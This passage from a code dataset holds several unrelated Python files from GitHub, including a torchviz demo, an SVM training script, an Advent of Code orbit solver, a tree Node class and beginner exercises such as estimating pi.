1.9)\n show_saved: whether to display saved tensor nodes that are not by custom\n autograd functions. Saved tensor nodes for custom functions, if\n present, are always displayed. 
(Requires PyTorch version >= 1.9)\n max_attr_chars: if show_attrs is `True`, sets max number of characters\n to display for any given attribute.\n\nmake_dot_from_trace(trace)\n This functionality is not available in pytorch core at\n https://pytorch.org/docs/stable/tensorboard.html\n\nresize_graph(dot, size_per_element=0.15, min_size=12)\n Resize the graph according to how much content it contains.\n\n Modify the graph in place.\n\"\"\"\n#%%\nimport torch\nimport torch.nn as nn\nimport torchviz as tv\n\n#%%\nmodel = nn.Sequential()\nmodel.add_module('W0', nn.Linear(8, 16))\nmodel.add_module('tanh', nn.Tanh())\nmodel.add_module('W1', nn.Linear(16, 1))\n\nx = torch.randn(1, 8)\ny = model(x)\n\ndict(model.named_parameters()) # dict( generator )\n\ntv.make_dot(y)\n\ntv.make_dot(y.mean())\n\n# add proper tensors/params names (to _leaves_ mainly)\ntv.make_dot(y.mean(), params=dict(model.named_parameters()))\n\n# Set `show_attrs=True` and `show_saved=True`\n# to see what autograd saves for the backward pass.\n# (Note that this is only available for pytorch >= 1.9.)\ntv.make_dot(y.mean(), params=dict(model.named_parameters()), show_attrs=True, show_saved=True)\ntv.make_dot(y.mean(), params=dict(model.named_parameters()), show_attrs=True)\ntv.make_dot(y.mean(), params=dict(model.named_parameters()), show_saved=True)\n\n#%%\n\n\n\n#%%\n\n\n\n#%%\n","repo_name":"RCanDo/NNRL","sub_path":"PyTorch/torchviz.py","file_name":"torchviz.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41525280585","text":"#!/usr/bin/env python3\n\nfrom sump_web import app, get_db\n\nimport time\nimport random\n\n\nif __name__ == '__main__':\n with app.app_context():\n db = get_db()\n st = int(time.time()) - 86400\n for t in range(86400):\n db.execute('INSERT INTO data VALUES(?, ?)', (st + t, random.randint(20, 40)))\n db.commit()","repo_name":"kz26/sump-sentinel","sub_path":"populate_test_data.py","file_name":"populate_test_data.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27452007502","text":"\ndef count_orbits(orbits):\n\n all = {}\n for orbit in orbits:\n\n a, b = orbit.split(\")\")\n if a not in all:\n all[a] = []\n all[a].append(b)\n\n def count_orbit(item):\n # direct orbits\n if item in all:\n return len(all[item]) + sum([count_orbit(i) for i in all[item]])\n else:\n return 0\n \n return sum([count_orbit(key) for key in all.keys()])\n\ndef count_orbital_transfers(orbits):\n\n all = {}\n for orbit in orbits:\n\n a, b = orbit.split(\")\")\n if a not in all:\n all[a] = []\n if b not in all:\n all[b] = []\n #make it bidirectional\n all[a].append(b)\n all[b].append(a)\n\n print(all)\n \n def shortest_path(source, target, path):\n if source == target:\n return path\n\n \"\"\" How many moves to get to the target?\"\"\"\n other_nodes = [p for p in all[source] if p not in path]\n paths = [shortest_path(node, target, path + [source]) for node in other_nodes]\n paths = [p for p in paths if p is not None]\n print(f\"{paths}\")\n if len(paths) > 0:\n return min(paths, key=len)\n else:\n return None\n \n return len(shortest_path(\"YOU\", \"SAN\", [])) - 2\n\n\n\ntest1 = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\"\"\".split(\"\\n\")\n\nassert(count_orbits(test1) == 42)\n\n\ntest2 = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\nK)YOU\nI)SAN\"\"\".split(\"\\n\")\n\nx = 
count_orbital_transfers(test2)\nprint(f\"x = {x}\")\nassert(x == 4)\n\norbits = open(\"day6.input\").read().split(\"\\n\")\nprint(count_orbital_transfers(orbits))\n","repo_name":"lshepard/advent-of-code","sub_path":"2019/day06-orbit-graph.py","file_name":"day06-orbit-graph.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8659723908","text":"####################\n# Import bibliotek #\n####################\n\nimport h5py\nimport numpy as np\nimport os\nimport glob\n#from sklearn.externals import joblib\nfrom sklearn import svm\nfrom sklearn import metrics\n\nprint(\"\\n\\n\")\nprint(\"[STATUS] Trenowanie...\")\n\n#################################\n# Wczytanie parametrów z plików #\n#################################\n\nh5_data_train = './/Praca MGR//Output//data.h5'\nh5_labels_train = './/Praca MGR//Output//labels.h5'\nh5_data_test = './/Praca MGR//Output//data-test.h5'\nh5_labels_test = './/Praca MGR//Output//labels-test.h5'\n\nh5f_data_train = h5py.File(h5_data_train, 'r')\nh5f_label_train = h5py.File(h5_labels_train, 'r')\nh5f_data_test = h5py.File(h5_data_test, 'r')\nh5f_label_test = h5py.File(h5_labels_test, 'r')\n\nglobal_features_string_train = h5f_data_train['dataset_1']\nglobal_labels_string_train = h5f_label_train['dataset_1']\nglobal_features_string_test = h5f_data_test['dataset_1']\nglobal_labels_string_test = h5f_label_test['dataset_1']\n\nglobal_features_train = np.array(global_features_string_train)\nglobal_labels_train = np.array(global_labels_string_train)\nglobal_features_test = np.array(global_features_string_test)\nglobal_labels_test = np.array(global_labels_string_test)\n\nh5f_data_train.close()\nh5f_label_train.close()\nh5f_data_test.close()\nh5f_label_test.close()\n\ntrainDataGlobal=global_features_train\ntrainLabelsGlobal=global_labels_train\ntestLabelsGlobal=global_labels_test\ntestDataGlobal=global_features_test\n\nprint(\"[STATUS] Dane przygotowane\")\nprint(\" Dane uczące : {}\".format(trainDataGlobal.shape))\nprint(\" Dane testujące : {}\".format(testDataGlobal.shape))\nprint(\" Klasy danych uczących : {}\".format(trainLabelsGlobal.shape))\nprint(\" Klasy danych testujących : {}\".format(testLabelsGlobal.shape))\n\n################################\n# Przygotowanie klasyfikatorów #\n################################\n\nclf = svm.SVC(kernel='linear') \nprint(\"[STATUS] Stworzono klasyfikator SVM\")\n\nclf.fit(trainDataGlobal, trainLabelsGlobal)\nprint(\"[STATUS] Trenowanie modelu zakończone\")\n\nprint(\"[STATUS] Predykcja...\")\npredLabelsGlobal = clf.predict(testDataGlobal)\n\ndata_num = len(testLabelsGlobal)\ncorrectly_tested = 0\nincorrectly_tested = 0\n\nfor i in range(0,data_num):\n current_test = testLabelsGlobal[i]\n current_pred = predLabelsGlobal[i]\n \n if(current_test == current_pred):\n correctly_tested += 1\n else: \n incorrectly_tested += 1\n\n\nprint(\"[STATUS] Predykcja zakończona\")\nprint(\" Dokładność (accuracy):\",metrics.accuracy_score(testLabelsGlobal, predLabelsGlobal))\nprint(\" Poprawnie sklasyfikowane: \", correctly_tested)\nprint(\" Niepoprawnie sklasyfikowane: \", incorrectly_tested)\n","repo_name":"kamilagontarz/image_classification","sub_path":"SVM_train.py","file_name":"SVM_train.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6163584142","text":"'''\nGiven an M x N matrix consiting of only 0 and 1, change all elements of 
row i and column j to 0 if cell (i,j) has value 0.\n\nInput:\n[ 1 1 0 1 1 ] r0, c2\n[ 1 1 1 1 1 ]\n[ 1 1 1 0 1 ] r2, c3\n[ 1 1 1 1 1 ]\n[ 0 1 1 1 1 ] r4, c0\n\nExpected Output:\n[ 0 0 0 0 0 ]\n[ 0 1 0 0 1 ]\n[ 0 0 0 0 0 ]\n[ 0 1 0 0 1 ]\n[ 0 0 0 0 0 ]\n\n- Consider only original input 0s -> create an output arr\n\nSolutions:\n1. as soon as we see a 0, resolve row and col\n - linear scan -> DFS to set 0s\n2. linear scan through the matrix, add i j of 0 to a set\n - after first pass, make another pass to set 0s \n - edge cases:\n - no early exit while scanning a row: a single row may contain several zero columns, so every 0 must be recorded\n'''\n\n# Runtime: O(m*n)\n# Space: O(m*n + max(m, n))\ndef matrixOverride(matrix):\n\n if not len(matrix):\n return -1\n\n m, n = len(matrix), len(matrix[0])\n output = [ [1 for _ in range(n)] for _ in range(m) ]\n zeroRow, zeroCol = set(), set()\n\n # first pass to detect 0s; no break on the first 0, otherwise later\n # zero columns in the same row would be missed\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == 0:\n zeroRow.add(i)\n zeroCol.add(j)\n\n # second pass to set 0s\n for i in range(m):\n\n # if the row is marked as 0, override\n if i in zeroRow:\n output[i] = [0]*n\n continue\n\n # row is not marked, check each col\n for j in range(n):\n if j in zeroCol:\n output[i][j] = 0\n \n return output\n\n# Testing\ncaseInput = [\n [ 1, 1, 0, 1, 1 ],\n [ 1, 1, 1, 1, 1 ],\n [ 1, 1, 1, 0, 1 ],\n [ 1, 1, 1, 1, 1 ],\n [ 0, 1, 1, 1, 1 ]\n]\ncaseOutput = [\n [0, 0, 0, 0, 0], \n [0, 1, 0, 0, 1], \n [0, 0, 0, 0, 0], \n [0, 1, 0, 0, 1], \n [0, 0, 0, 0, 0]\n]\n\nprint('Test 1')\nprint('output {}'.format(matrixOverride(caseInput)))\nprint('expected {}'.format(caseOutput))\n","repo_name":"nionata/Algorithms","sub_path":"interviews/Knightscope - Set Matrix Zeroes.py","file_name":"Knightscope - Set Matrix Zeroes.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
{"seq_id":"16650051485","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 27 15:24:24 2021\r\n\"\"\"\r\n\r\nimport copy\r\nimport numpy as np\r\n\r\nimport sys\r\nsys.setrecursionlimit(100000)\r\n\r\n\r\nclass Node(object):\r\n \r\n \r\n def __init__(self, node = None, node_id = -1, attribute = 0, label = -1, parent = None, children = None):\r\n \r\n if node is not None:\r\n #Create a copy of a Tree instance\r\n assert isinstance(node,Node), \"The initial node must be a proper class Node\"\r\n self.__init__(node_id = copy.deepcopy(node.node_id),\r\n attribute = copy.deepcopy(node.attribute),\r\n label = copy.deepcopy(node.label),\r\n parent = copy.deepcopy(node.parent), \r\n children = copy.deepcopy(node.children)) \r\n \r\n else: #Create a Tree instance from information\r\n \r\n #Initialization \r\n self.node_id = node_id \r\n self.node_connections = []\r\n self.children = []\r\n self.matrix_connections = None\r\n self.attribute = np.asarray([attribute])\r\n self.label = label\r\n \r\n #Link to the parent\r\n if parent is not None:\r\n assert isinstance(parent,Node), \"Error : the specified parent is not a Node object\"\r\n self.parent = parent\r\n \r\n #Set the node's depth\r\n if self.parent is not None:\r\n self.depth = self.parent.depth+1\r\n else:\r\n self.depth = 0\r\n \r\n #Add children\r\n if children is not None and children != []:\r\n for child in children:\r\n assert isinstance(child,Node)\r\n self.add_child(child) \r\n\r\n for child in self.children:\r\n self.node_connections.append([self.node_id,child.node_id])\r\n \r\n\r\n def __del__(self):\r\n del self\r\n \r\n \r\n def del_all(self):\r\n del self.node_connections\r\n del 
self.matrix_connections\r\n for child in self.children:\r\n child.del_all()\r\n # deliberately no self.parent.del_all() here: recursing towards the root\r\n # would immediately come back down into this node's children and never terminate\r\n \r\n\r\n def set_id(self, new_id):\r\n \"\"\"\r\n Set an ID if it does not exist in the tree\r\n \"\"\"\r\n \r\n list_ids = self.get_nodes_list([])\r\n if new_id in list_ids:\r\n print(\"This ID already exists, aborting.\")\r\n else:\r\n self.node_id = new_id\r\n \r\n return\r\n\r\n\r\n def reset_ids(self, count):\r\n \"\"\"\r\n Renumber every node id (and the stored connections) in depth-first order, starting from the root\r\n \"\"\"\r\n if count == 0 and self.parent is not None:\r\n root = self.get_root()\r\n root.reset_ids(0)\r\n \r\n else:\r\n self.node_id = count \r\n for b_con in self.node_connections:\r\n b_con[0] = count\r\n count+=1\r\n for i,child in enumerate(self.children):\r\n self.node_connections[i][1] = count\r\n count = child.reset_ids(count)\r\n \r\n return count\r\n\r\n\r\n def clean_ids(self, count = 0, force = False):\r\n \"\"\"\r\n Check through all the tree to avoid node_id duplicates.\r\n If count is 0, and there are duplicates in the ids, or if force is True,\r\n will reset the nodes ids.\r\n \"\"\"\r\n \r\n if not force: #Then we have to make a test first\r\n list_ids = self.get_nodes_list([])\r\n if len(list_ids)==len(np.unique(list_ids)):\r\n return\r\n \r\n else:\r\n if count == 0:\r\n root = self.get_root()\r\n root.node_id = 0\r\n count += 1\r\n for child in root.children:\r\n child.clean_ids(count, force = True) # Set force to True because no need to check the id list anymore \r\n else:\r\n self.node_id = count\r\n count+=1\r\n for child in self.children:\r\n child.clean_ids(count, force = True)\r\n \r\n return\r\n else: #force is True and we reset the nodes ids\r\n if count == 0:\r\n root = self.get_root()\r\n root.node_id = 0\r\n count += 1\r\n for child in root.children:\r\n child.clean_ids(count, force = force) \r\n else:\r\n self.node_id = count\r\n count+=1\r\n for child in self.children:\r\n child.clean_ids(count, force = force)\r\n \r\n return\r\n \r\n\r\n def update_ids(self, removed_id):\r\n \"\"\"\r\n When a node is removed, update the ids in consequence.\r\n \"\"\"\r\n \r\n if self.node_id > removed_id:\r\n self.node_id-=1\r\n \r\n # shift every stored connection endpoint above the removed id down by one\r\n for b_con in self.node_connections:\r\n if b_con[0]>removed_id:\r\n b_con[0]-=1\r\n if b_con[1]>removed_id:\r\n b_con[1]-=1\r\n \r\n for child in self.children:\r\n child.update_ids(removed_id)\r\n \r\n return\r\n\r\n \r\n def __print__(self):\r\n print('Node : ', self.node_id)\r\n for child in self.children:\r\n child.__print__() \r\n return\r\n \r\n \r\n #%% ACCESSORS\r\n def get_nodes_list(self, list_nodes_id):\r\n \"\"\"\r\n List all 
the nodes id in the tree, starting at the root.\r\n\r\n Parameters\r\n ----------\r\n list_nodes_id : list\r\n The list of the nodes ids.\r\n\r\n Returns\r\n -------\r\n list_nodes_id : list\r\n The list of the nodes ids.\r\n\r\n \"\"\"\r\n \r\n if start:\r\n root = self.get_root()\r\n tmp = []\r\n for child in root.children:\r\n tmp += child.get_interior_nodes_list(list_nodes_id = tmp, start = False) \r\n return tmp\r\n \r\n else:\r\n if self.children == []:\r\n return []\r\n else:\r\n tmp = []\r\n for child in self.children:\r\n tmp += child.get_interior_nodes_list(list_nodes_id = tmp, start = False)\r\n tmp = [self.node_id] + tmp\r\n return tmp\r\n \r\n\r\n def get_root(self):\r\n \r\n root = self\r\n if self.parent is not None and self.node_id!=0:\r\n root = self.parent.get_root()\r\n\r\n return root\r\n\r\n\r\n def get_node(self, node_id, start = 0):\r\n \"\"\"\r\n WARNING : \r\n The current implementation requires to search recursively through the tree.\r\n A faster method could be to build the connectivity matrix and automatically \r\n get the node we are looking for.\r\n \"\"\"\r\n target_node = None\r\n if self.node_id == node_id:\r\n return self\r\n else:\r\n for child in self.children:\r\n target_node = child.get_node(node_id) \r\n if target_node is not None:\r\n break\r\n\r\n return target_node\r\n\r\n\r\n def get_siblings(self):\r\n \"\"\"\r\n \r\n \"\"\"\r\n \r\n siblings = None\r\n if self.parent is not None:\r\n siblings = self.parent.children\r\n return siblings\r\n \r\n \r\n def is_leaf(self):\r\n \"\"\"\r\n Simple wrapper to check whether the node is a leaf.\r\n\r\n Returns\r\n -------\r\n bool\r\n Whether the branch is a leaf or not.\r\n\r\n \"\"\"\r\n return self.children==[]\r\n \r\n \r\n def get_leaves(self):\r\n \"\"\"\r\n \r\n \"\"\"\r\n \r\n if self.children == []:\r\n return [self]\r\n leaves_list = []\r\n for child in self.children:\r\n leaves_list += child.get_leaves()\r\n \r\n return leaves_list\r\n \r\n \r\n def get_leaves_IDs(self):\r\n \"\"\"\r\n Returns list of leaves IDs under the current node.\r\n \"\"\"\r\n \r\n if len(self.children)==0:return [self.node_id]\r\n l=[]\r\n for child in self.children:\r\n l+=child.get_leaves_IDs()\r\n return l \r\n \r\n \r\n def get_leaves_labels(self):\r\n \"\"\"\r\n Returns list of leaves IDs under the current node.\r\n \"\"\"\r\n \r\n if len(self.children)==0:return [self.label]\r\n l=[]\r\n for child in self.children:\r\n l+=child.get_leaves_labels()\r\n return l\r\n \r\n \r\n def ancestors(self): \r\n \"\"\"\r\n Return ancestor nodes and self node in order root->bottom\r\n\r\n Returns\r\n -------\r\n list\r\n The list of node ids from the root to the starting node.\r\n \"\"\"\r\n if self.parent==None: \r\n return [self.node_id]\r\n else: \r\n return self.parent.ancestors()+[self.node_id]\r\n \r\n \r\n def descendants(self):\r\n \"\"\"\r\n Return descendant nodes and self node in order root->bottom\r\n\r\n Returns\r\n -------\r\n list\r\n The list of nodes from starting node to the leaves.\r\n \"\"\"\r\n if self.children==[]: \r\n return [self]\r\n else: \r\n tmp = [self]\r\n for child in self.children:\r\n tmp+=child.descendants()\r\n return tmp\r\n \r\n \r\n def get_depth(self, depth = 0):\r\n \"\"\"\r\n Node\r\n\r\n Parameters\r\n ----------\r\n depth : int, optional\r\n To initialize the depth count. 
The default is 0.\r\n\r\n Returns\r\n -------\r\n depth : int\r\n The depth of the node.\r\n\r\n \"\"\"\r\n if self.parent is not None:\r\n depth+=1\r\n depth = self.parent.get_depth(depth = depth)\r\n \r\n return depth\r\n \r\n\r\n def get_max_depth(self):\r\n \"\"\"\r\n \r\n \"\"\"\r\n max_depth = 0\r\n root = self.get_root()\r\n leaves = root.get_leaves()\r\n\r\n for leaf in leaves:\r\n l_depth = leaf.get_depth() \r\n if l_depth > max_depth:\r\n max_depth = l_depth\r\n\r\n return max_depth\r\n \r\n \r\n def connectivity_matrix(self, force = False):\r\n \"\"\"\r\n \r\n Parameters\r\n ----------\r\n force : Boolean\r\n Whether one wants to force the nodes id reinitialization.\r\n\r\n Returns\r\n -------\r\n connections : numpy array\r\n (n_nodes x n_nodes) matrix with 1 at connected nodes.\r\n \"\"\"\r\n self.clean_ids(count = 0, force = force)\r\n \r\n list_nodes = self.get_nodes_list([])\r\n \r\n # the adjacency matrix must be 2-D: (n_nodes x n_nodes)\r\n connections = np.zeros((len(list_nodes), len(list_nodes)))\r\n \r\n for i, node_id in enumerate(list_nodes):\r\n \r\n node = self.get_node(node_id)\r\n \r\n for child in node.children:\r\n # lists have no find(); index() returns the position of the child id\r\n ind_child_list = list_nodes.index(child.node_id)\r\n connections[i,ind_child_list] = 1\r\n connections[ind_child_list,i] = 1\r\n \r\n return connections, list_nodes\r\n \r\n \r\n def lowest_common_ancestor(self, other_node):\r\n \"\"\"\r\n \r\n Parameters\r\n ----------\r\n other_node : Tree\r\n The node for which 'self' is looking for their closest common ancestor.\r\n\r\n Returns\r\n -------\r\n LCA : Tree\r\n The closest common ancestor to self and other_node.\r\n \"\"\"\r\n \r\n if self == other_node:\r\n return self\r\n \r\n LCA = self.get_root()\r\n \r\n self_depth = self.depth\r\n depth_other = other_node.depth\r\n \r\n if self_depth >= depth_other:\r\n parent = self.parent\r\n other = other_node\r\n #other_depth = depth_other\r\n else:\r\n parent = other_node.parent\r\n other = self\r\n #other_depth = self_depth\r\n \r\n list_ancestors = []\r\n found = False\r\n\r\n #First we climb the tree starting from the deepest node\r\n while parent is not None and found is False:\r\n if parent == other:\r\n LCA = parent\r\n found = True \r\n else: #parent.depth <= other_depth:\r\n list_ancestors.append(parent)\r\n parent = parent.parent\r\n \r\n \r\n if found is True:\r\n return LCA \r\n else: \r\n #The proximal node was not an ancestor, hence we climb the tree \r\n #from the highest node, and search in the first node's ancestors.\r\n parent = other.parent\r\n while parent is not None and found is False:\r\n if parent in list_ancestors:\r\n found = True\r\n LCA = parent\r\n else:\r\n parent = parent.parent\r\n \r\n return LCA\r\n \r\n \r\n #%% ADD/REMOVE\r\n def add_child(self, node, set_id = False, prepend=False):\r\n \"\"\"\r\n Add a child to self.\r\n\r\n Parameters\r\n ----------\r\n \r\n node : Tree,\r\n The node to attach as a child of self. \r\n \r\n set_id : bool, optional (Default : False)\r\n If True, will check if the new child's id is available, and set \n a new one if not. 
\r\n \r\n prepend : bool, optional (Default : False) \r\n If True, update the branches ids and connections once the node \r\n removed.\r\n \r\n offset : bool, optional (Default : False)\r\n If True, and if merge is True, will translate the subtree to match\r\n the new parent's las point.\r\n \r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n \r\n assert isinstance(node,Node), \"the parameter node is not an instance of Node class.\"\r\n \r\n if set_id:\r\n nodes_list = self.get_nodes_list([])\r\n \r\n if (node.node_id == -1 or node.node_id in nodes_list):\r\n print('Setting a new id')\r\n node.node_id = max(nodes_list)+1\r\n node.parent = self \r\n if prepend:\r\n self.children.insert(0, node)\r\n self.node_connections.insert(0, [self.node_id,node.node_id])\r\n else:\r\n self.children.append(node)\r\n self.node_connections.append([self.node_id,node.node_id])\r\n \r\n return\r\n \r\n \r\n def add_node(self, node, parent_id = 0):\r\n assert isinstance(node,Node), \"The new node must be a proper class Node\"\r\n \r\n if self.data is None:\r\n print(\"Adding a node to an empty Node, initializing with this node\")\r\n self.__init__(node = node)\r\n else:\r\n parent = self.get_node(parent_id)\r\n if parent is not None:\r\n parent.children.append(node)\r\n node.parent = parent\r\n else:\r\n print(\"Did not find the parent in the current node (root : {0})\".format(self.node_id))\r\n return\r\n \r\n \r\n def delete_subtree(self, subtree_root_id, subtree_root = None):\r\n \r\n if subtree_root is None:\r\n subtree_root = self.get_node(subtree_root_id)\r\n \r\n for child in subtree_root.children:\r\n child.delete_subtree(child.node_id)\r\n \r\n if(subtree_root is None):\r\n print(\"Found nothing to remove\")\r\n \r\n del subtree_root\r\n \r\n return\r\n \r\n \r\n \r\n def remove_node(self, node_id, node2remove = None, merge = True, update = True):\r\n \"\"\"\r\n Remove a node in the tree and update the nodes ids. \r\n\r\n Parameters\r\n ----------\r\n node_id : int\r\n The id of the node to remove.\r\n \r\n node2remove : Tree, optional (Default : None)\r\n If provided, remove this node directly instead of searching by the \r\n node id. The default is None.\r\n \r\n merge : bool, optional (Default : True)\r\n If True, merge the descendants to the parent's children. 
\r\n \r\n update : bool, optional (Default : True) \r\n If True, update the branches ids and connections once the node is removed.\r\n \r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n \r\n if node2remove is None:\r\n node2remove = self.get_node(node_id)\r\n \r\n node_id2remove = node2remove.node_id\r\n \r\n if node_id2remove != node_id:\r\n print(\"Different node id asked ({0}) and selected to remove ({1})\".format(node_id, node_id2remove))\r\n \r\n if node2remove.parent is not None:\r\n if merge:\r\n for child in node2remove.children:\r\n node2remove.parent.add_child(child)\r\n \r\n parent_id = node2remove.parent.node_id\r\n node2remove.parent.children.remove(node2remove)\r\n node2remove.parent.node_connections.remove([parent_id, node2remove.node_id])\r\n \r\n if update:\r\n root = self.get_root()\r\n root.update_ids(node_id2remove)\r\n \r\n node2remove.__del__()\r\n \r\n return\r\n \r\n \r\n def move_node(self, node2move, targetparent, move_subtree = False, offset = False, update = True):\r\n \"\"\"\r\n \r\n Move a node either with its descendants or alone, and add it to\r\n the children list of a given target node.\r\n \r\n Parameters\r\n ----------\r\n node2move : Tree\r\n The node that has to be moved.\r\n targetparent : Tree\r\n The happy parent node, to whom we add the node to move as child.\r\n move_subtree : bool\r\n If True, all the descendants follow the node to move.\r\n If False, the node to move is bypassed\r\n\r\n Returns\r\n -------\r\n None.\r\n \r\n \"\"\"\r\n assert isinstance(targetparent,Node), \"Error : the specified parent is not a Node instance\"\r\n assert isinstance(node2move,Node), \"Error : the node to move is not a Node instance\"\r\n \r\n merge_descendent = not move_subtree\r\n \r\n node_tmp = copy.deepcopy(node2move)\r\n id_stored = node2move.node_id\r\n \r\n self.remove_node(id_stored,node2remove=node2move,merge=merge_descendent, update = update)\r\n \r\n node_tmp.node_id = id_stored\r\n if merge_descendent:\r\n node_tmp.children = []\r\n node_tmp.node_connections = []\r\n \r\n # add_child() takes no 'offset' keyword, so the subtree is attached as-is;\r\n # the offset argument stays in the signature for compatibility but is unused\r\n targetparent.add_child(node_tmp)\r\n \r\n return\r\n \r\n \r\n def insert_node(self, new_node, target_children, update = False):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n new_node : Tree\r\n The node that has to be inserted.\r\n target_children : list\r\n list of children node_ids.\r\n\r\n Returns\r\n -------\r\n None\r\n \"\"\"\r\n \r\n self.add_child(new_node, set_id = True)\r\n \r\n ind_sel = []\r\n \r\n for i,child in enumerate(self.children):\r\n if child.node_id in target_children:\r\n ind_sel.append(i)\r\n \r\n cpt = 0\r\n \r\n for ind in ind_sel:\r\n node2move = self.children[ind-cpt]\r\n self.move_node(node2move, new_node, move_subtree = True, update = update)\r\n cpt+=1\r\n \r\n return\r\n \r\n \r\n def find_smallest_split(self, list_leaves_ids):\r\n \"\"\"\r\n Recursive function finding the most distal node leading to the set of \r\n leaves list_leaves ids.\r\n \r\n Parameters\r\n ----------\r\n list_leaves_ids : list\r\n The leaf labels whose most distal common split is sought.\r\n\r\n Returns\r\n -------\r\n next_split : Tree\r\n Returns a Tree if we found a node whose descendant leaves contain the split\r\n \"\"\"\r\n \r\n current_leaves = self.get_leaves_labels()\r\n\r\n if set(list_leaves_ids).issubset(current_leaves):\r\n \r\n for child in self.children:\r\n next_split = 
child.find_smallest_split(list_leaves_ids)\r\n if next_split is not None: #then we found a deeper node whose set of descendant leaves contains the list_leaves.\r\n return next_split\r\n break\r\n \r\n return self #then self is the deepest node containing the set of leaves we seek.\r\n \r\n return None\r\n \r\n \r\n ##############################################################################\r\n ##################### FUNCTIONS COPIED FROM GEOMETREE ########################\r\n ##############################################################################\r\n \r\n def newick(self,intern=False):\r\n \"\"\"\r\n Convert the tree to the newick representation. \r\n In this syntax, the interior nodes have no name, and are defined by\r\n the set of leaves (splits) one can have by removing them.\r\n \r\n Parameters\r\n ----------\r\n intern : bool (Default : False)\r\n Whether the node is interior or not.\r\n\r\n Returns\r\n -------\r\n None.\r\n \"\"\"\r\n if len(self.children)==0:\r\n return \"{0}:{1}\".format(self.node_id,self.get_length())\r\n s=\"(\"+str(self.children[0].newick(intern))\r\n for i in range(1,len(self.children)):\r\n s+=\",\"+str(self.children[i].newick(intern))\r\n s+=')'\r\n if self.parent is None:return s\r\n if intern:s+=str(self.node_id)\r\n s+=\":{0}\".format(self.get_length())\r\n return s\r\n \r\n \r\n def full_newick(self,intern=False):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n intern : TYPE, optional\r\n DESCRIPTION. The default is False.\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n l = str(self.get_length())\r\n s = '('+self.newick(intern=intern)+'0:'+l+')'\r\n\r\n return s\r\n\r\n \r\n def newick_labels(self):\r\n \"\"\"\r\n Convert the tree to the newick representation. \r\n In this syntax, the interior nodes have no name, and are defined by\r\n the set of leaves (splits) one can have by removing them.\r\n \r\n Parameters\r\n ----------\r\n intern : bool (Default : False)\r\n Whether the node is interior or not.\r\n bl : bool (Default : False)\r\n Whether we want the length of the branches or not.\r\n\r\n Returns\r\n -------\r\n None.\r\n \"\"\"\r\n if len(self.children)==0:\r\n return \"{0}:{1}\".format(self.label,self.get_length())\r\n s=\"(\"+str(self.children[0].newick_labels())\r\n for i in range(1,len(self.children)):\r\n s+=\",\"+str(self.children[i].newick_labels())\r\n s+=')'\r\n if self.parent is None:return s #'('+s+':'+str(self.get_length())+')'\r\n s+=\":{0}\".format(self.get_length())\r\n return s\r\n \r\n","repo_name":"HughLDDMM/TreeLDDMMCVPR","sub_path":"tree_space/node_class.py","file_name":"node_class.py","file_ext":"py","file_size_in_byte":24806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"20897601927","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Grid Drawer\n\n# In[ ]:\n\n\ndef draw_grid(m=2, n=3):\n index = 0\n while index < m:\n print('+'+' - - +'*n)\n print('/'+' /'*n)\n print('/'+' /'*n)\n index = index + 1\n print('+'+' - - +'*n)\n\n\n# In[ ]:\n\n\nif __name__ == '__main__': \n draw_grid()\n draw_grid(3, 2)\n\n\n# # Estimate pi\n\n# In[ ]:\n\n\nimport math\ndef estimate_pi():\n k = 0\n s = 0.0\n t = 0.0\n while True:\n t = (math.factorial(4*k)*(1103+26390*k))/(math.pow(math.factorial(k), 4)*math.pow(396, (4*k)))\n s += t\n k += 1\n if t < 1e-15:\n break\n \n s *= (2*math.sqrt(2))/9801\n return 1/s\n\n\n# In[ ]:\n\n\nif __name__ == '__main__': \n print(estimate_pi() == math.pi)\n print(estimate_pi())\n print(math.pi)\n\n\n# # Reverse Pair\n\n# 
In[ ]:\n\n\ndef find_reverse_pair(word_list, case_sensitive = False):\n reverse_pair_list = []\n \n if not case_sensitive:\n word_list = [word.lower() for word in word_list]\n \n for word in word_list:\n if word[::-1] in word_list[word_list.index(word) + 1::]:\n reverse_pair_list.append([word, word[::-1]])\n \n return reverse_pair_list\n\n\n# In[ ]:\n\n\nif __name__ == '__main__': \n import time\n time_start = time.time()\n\n with open(r'C:\\Users\\88697\\Downloads\\words.txt', 'r') as file:\n word_list = file.read().splitlines()\n reverse_pair_list = find_reverse_pair(word_list)\n\n time_end = time.time()\n\n print('Finish executing after', time_end - time_start, 's\\n')\n print('Found', len(reverse_pair_list), 'reverse pairs\\n', )\n print(reverse_pair_list)\n\n\n# # Reverse Lookup\n\n# In[ ]:\n\n\ndef reverse_lookup(d, v):\n k = []\n if v in d.values():\n for k1 in d:\n if d.get(k1) == v:\n k.append(k1)\n return k\n\n\n# In[ ]:\n\n\nif __name__ == '__main__':\n ben = {'name':'James', 'age':26, 'best friend':'James', 'shoe size':26, 24:'James', 23:26}\n print(reverse_lookup(ben, 'James'))\n\n","repo_name":"ndrw1221/Data-Science","sub_path":"Lab02/Data Science Lab02.py","file_name":"Data Science 